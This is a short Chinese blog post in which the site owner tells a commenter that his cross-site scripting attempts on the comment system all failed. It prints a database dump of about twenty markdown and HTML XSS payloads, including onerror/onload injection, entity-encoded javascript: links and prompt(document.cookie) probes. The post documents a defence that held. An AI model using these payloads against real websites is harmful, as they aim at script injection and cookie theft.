感谢测试,让您失望了,好像一条都没有成功呢?

下次测试的时候不要再别人的评论下回复了……免得发过多干扰邮件。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ echo 'select id,author,source from comments where id >= 1855' | sqlite3 taoblog/taoblog.db
1855|james|![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
1856|james|<img src="" onerror="alert('XSS') alt="Uh oh...">
1857|james|![Uh oh...]("onerror="alert('XSS'))
1858|james|[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
1859|james|![test]("onerror="alert('xss'))
1860|james|![test](https://xzfile.aliyuncs.com/media/upload/picture/20190302105527-a276e4a8-3c96-1.png"onload="alert('xss'))
1861|james|
[XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))

1862|james|[XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
1863|james|XSS](Javas&#99;ript:alert(1&#41;)
1864|james|[XSS](Javas&#99;ript:alert(1&#41;)
1865|james|[XSS](Javas%26%2399;ript:alert(1&#41;)
1866|james|![XSS'"`onerror=prompt(document.cookie)](x)\
1867|james|![XSS'" onerror="prompt(document.cookie)](x)\
1868|james|![XSS"  onerror="alert(document.cookie)](x)\
1869|james|![XSS' onload='alert(&apos;xss&apos;)](x)\
1870|james|![XSS” onload=“alert(&apos;xss&apos;)](x)\
1871|james|![XSS" onload="alert(&apos;xss&apos;)](x)\
1872|james|![XSS" onerror="alert(&apos;xss&apos;)](x)\
1873|james|![XSS\" onerror=\"alert(&apos;xss&apos;)](x)\
1874|james|[XSS](�javascript:alert(document.domain&#41;)

等等……怎么那么多中文引号……😅😅😅

#XSS #安全

碎碎念 桃子 编辑